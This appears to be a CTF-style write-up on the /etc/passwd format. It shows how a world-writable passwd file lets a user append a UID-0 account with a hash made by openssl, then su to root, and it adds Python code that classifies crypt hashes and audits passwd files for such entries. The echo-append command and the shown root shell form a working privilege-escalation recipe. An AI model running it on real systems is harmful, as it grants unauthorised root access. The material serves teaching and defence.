etc/passwd file :
The /etc/passwd file stores the user account information that is required at login. It is a plain text file containing one entry for each user or account on a computer running Linux or another Unix-like operating system. By default its permissions make it world readable, that is, readable by any user on the system. Example :
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
pulse:x:116:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
nm-openvpn:x:117:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
avahi:x:118:125:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
john:x:1000:1000:john,,,:/home/john:/bin/bash
The file contains an entry for every user on the system. Each entry consists of seven colon-separated fields, in this order : UserName | Password | UserID | GroupID | UserInformation | HomeDirectory | Shell
- UserName is the user's login name, that is, the name a user types when logging into the system.
- The Password field originally contained the hashed login password. For security reasons the hashed passwords are now kept in another file, /etc/shadow, which cannot be read by ordinary users. This field now merely contains the letter x to indicate that a password has been assigned to the user and is required for authentication. If this field is empty, the user can log in without a password.
- UserID is the user's unique numeric identifier, which the system uses for access control. Zero is reserved for the root account.
- GroupID specifies the user's primary group identification number. This is usually the same as the user ID.
- UserInformation is a comment field. It allows extra information about the user to be recorded, such as full name, phone number, etc.
- HomeDirectory is the full path of the user's home directory.
- Shell is the full path of the user's default shell.
etc/shadow file :
The actual password data is stored in a file called "/etc/shadow". This file does not contain passwords in plain text; it contains password hashes. Unlike /etc/passwd, it can only be read or edited by the root user.
Now in some cases the /etc/passwd file is also writable by normal users (especially in some CTF challenges), in which case a normal user can gain root access by manually editing this file.
Note: This method only works if /etc/passwd is readable and writable by all users. For example :
$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 2364 Nov 16 2017 /etc/passwd
In this case, by appending a new user entry with UID 0 (root privileges) and a password hash to the /etc/passwd file, we can get a root shell.
Preparing new user to append on file :
The root user entry looks like this :
root:x:0:0:root:/root:/bin/bash
Now we have to place our hashed password in place of the x.
Creating Password :
There are many methods to create a hashed password, for example :
With Python :
$ python3 -c 'import crypt; print(crypt.crypt("password", "$6$salt"))'
$6$salt$3aEJgflnzWuw1O3tr0IYSmhUY0cZ7iBQeBP392T7RXjLP3TKKu3ddIapQaCpbD4p9ioeGaVIjOHaym7HvCuUm0
where "password" is the password and "$6$salt" is the salt value (the $6$ prefix selects SHA-512 crypt). Note that Python's crypt module is deprecated since Python 3.11 and was removed in 3.13, so this only works on older interpreters.
With mkpasswd :
$ mkpasswd -m SHA-512 password
$6$FXCnL/3ctsXQJ$2PNnFRCTyb0uh/pq5xsDyfqGIJruZmgVoYsTcioET1xK2sO.73P3JyM3W0UGSVm5DA7KxBleRqx8Ldfb/OVx7/
With OpenSSL:
$ openssl passwd -1 -salt hack password123
$1$hack$MLgkAESrYp7kzYz0Ex2fV/
Where :
- -1 : MD5-based password algorithm (other options are -5 for SHA-256 and -6 for SHA-512)
- -salt : the salt value, which is "hack" here; the password is password123
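The three openssl options correspond to the $1$, $5$ and $6$ prefixes of the hash strings shown above. The Python below is an added example, not code from this write-up, that parses the $id$[rounds=N$]salt$hash layout of such a field and reports the algorithm, salt and cost, flagging MD5-crypt as legacy. The sample hashes are the ones printed on this page plus a constructed one with an explicit rounds= value; it also handles the older 13-character DES-crypt form, which the page does not cover.

```python
"""Identify the algorithm behind a crypt(3)-style password field."""

# Modular-crypt-format ids used by glibc's crypt(3) for the options named above.
CRYPT_IDS = {
    "1": "MD5-crypt",
    "5": "SHA-256-crypt",
    "6": "SHA-512-crypt",
}

# Values that mean "no hash here": shadowed ('x'), or locked/disabled markers.
NOT_A_HASH = {"", "x", "*", "!", "!!"}


def classify_hash(field):
    """Return {'algorithm', 'salt', 'rounds', 'weak'} for a password field.

    Raises ValueError for fields that carry no hash or are malformed."""
    if field in NOT_A_HASH:
        raise ValueError(f"not a password hash: {field!r}")
    if not field.startswith("$"):
        # Traditional DES-crypt: 2 salt characters + 11 hash characters, no '$' markers.
        if len(field) == 13:
            return {"algorithm": "DES-crypt", "salt": field[:2], "rounds": None, "weak": True}
        raise ValueError(f"unrecognised hash format: {field!r}")
    parts = field.split("$")[1:]          # ['id', ('rounds=N',) 'salt', 'hash']
    ident, rest = parts[0], parts[1:]
    if ident not in CRYPT_IDS:
        raise ValueError(f"unknown crypt id ${ident}$")
    rounds = None
    if rest and rest[0].startswith("rounds="):
        # SHA-crypt accepts an explicit cost parameter; MD5-crypt does not.
        if ident == "1":
            raise ValueError("rounds= is not valid for MD5-crypt")
        rounds = int(rest[0][len("rounds="):])
        rest = rest[1:]
    if len(rest) != 2 or not rest[1]:
        raise ValueError(f"malformed hash: {field!r}")
    salt, digest = rest
    # MD5-crypt is fast to brute-force and is treated as legacy by modern distributions.
    return {"algorithm": CRYPT_IDS[ident], "salt": salt, "rounds": rounds, "weak": ident == "1"}


if __name__ == "__main__":
    # Sample inputs: the hashes printed earlier on this page plus a constructed rounds= example.
    samples = [
        "$1$hack$MLgkAESrYp7kzYz0Ex2fV/",
        "$6$salt$3aEJgflnzWuw1O3tr0IYSmhUY0cZ7iBQeBP392T7RXjLP3TKKu3ddIapQaCpbD4p9ioeGaVIjOHaym7HvCuUm0",
        "$6$rounds=10000$constructedsalt$CONSTRUCTEDNOTREAL",
    ]
    for s in samples:
        print(s[:24] + "...", classify_hash(s))
```

The 'weak' flag is what a shadow-file audit would act on: a $1$ entry means the account's password was hashed with MD5-crypt and should be rehashed with SHA-512 or stronger at the next password change.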
newroot:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash
Now append the above line to the /etc/passwd file :
$ echo "newroot:\$1\$hack\$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash" >> /etc/passwd
Note : don't forget to put a \ before every $ in the password field, otherwise the shell will expand them as variables before echo ever sees them.
Now try to login with our newly created user.
$ su - newroot
$ whoami
root
And that's it, we got a root shell.
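From the defender's side, the field layout described earlier and the appended-entry trick above give a concrete checklist: /etc/passwd must not be world writable, no account other than root should have UID 0, and the password field should hold x rather than a hash or nothing. The Python below is an added example, not part of this write-up, that parses passwd-format text into the seven fields and reports exactly those conditions. The sample data is constructed: three lines copied from the listing above plus two made-up entries (one with a placeholder hash, one with an empty password field); audit_file applies the same checks to a real file.

```python
"""Audit /etc/passwd-format data for the traces a hand-edited entry leaves."""
import os
import stat
from dataclasses import dataclass

# Constructed sample input: the first three lines are copied from the listing
# earlier on the page, the last two are made up to exercise the checks
# (the hash is a placeholder, not a real password hash).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
john:x:1000:1000:john,,,:/home/john:/bin/bash
newroot:$1$PLACEHOLDER$NOTAREALHASH:0:0:root:/root:/bin/bash
guest::1001:1001:guest,,,:/home/guest:/bin/bash
"""


@dataclass
class PasswdEntry:
    """One /etc/passwd record: the seven colon-separated fields in file order."""
    name: str
    password: str
    uid: int
    gid: int
    gecos: str       # the UserInformation / comment field
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd-format text into PasswdEntry objects.

    Blank lines and '#' comments are skipped; any other line without exactly
    seven fields is rejected, since a malformed line is itself a sign of hand editing."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_entries(entries):
    """Return (account, finding) pairs for entries a defender should look at."""
    findings = []
    seen_uid = {}
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append((e.name, "uid 0 account other than root"))
        if e.uid in seen_uid:
            findings.append((e.name, f"duplicate uid {e.uid}, already used by {seen_uid[e.uid]}"))
        else:
            seen_uid[e.uid] = e.name
        if e.password == "":
            findings.append((e.name, "empty password field: login without a password"))
        elif e.password.startswith("$") or len(e.password) == 13:
            # 'x' (or '*') is expected here; a $id$salt$hash or 13-character DES
            # string means a hash was written into passwd instead of shadow.
            findings.append((e.name, "password hash stored in passwd instead of shadow"))
    return findings


def world_writable(mode):
    """True if an st_mode value has the 'other write' bit set (e.g. -rw-rw-rw-)."""
    return bool(mode & stat.S_IWOTH)


def audit_file(path="/etc/passwd"):
    """Combine the permission check and the entry checks for a real file."""
    findings = []
    st = os.stat(path)
    if world_writable(st.st_mode):
        findings.append((path, "world writable, expected mode 0644 owned by root"))
    with open(path, encoding="utf-8") as fh:
        findings.extend(audit_entries(parse_passwd(fh.read())))
    return findings


if __name__ == "__main__":
    for account, finding in audit_entries(parse_passwd(SAMPLE_PASSWD)):
        print(f"{account}: {finding}")
    if os.path.exists("/etc/passwd"):
        for account, finding in audit_file():
            print(f"{account}: {finding}")
```

Run on the sample, the newroot line is reported three times (UID 0 under a name other than root, duplicate of root's UID, and a hash in the password field) and the guest line once; the three unmodified lines produce nothing. On a real host the expected permission is 0644 root:root, and any world-writable bit is the precondition this whole technique depends on.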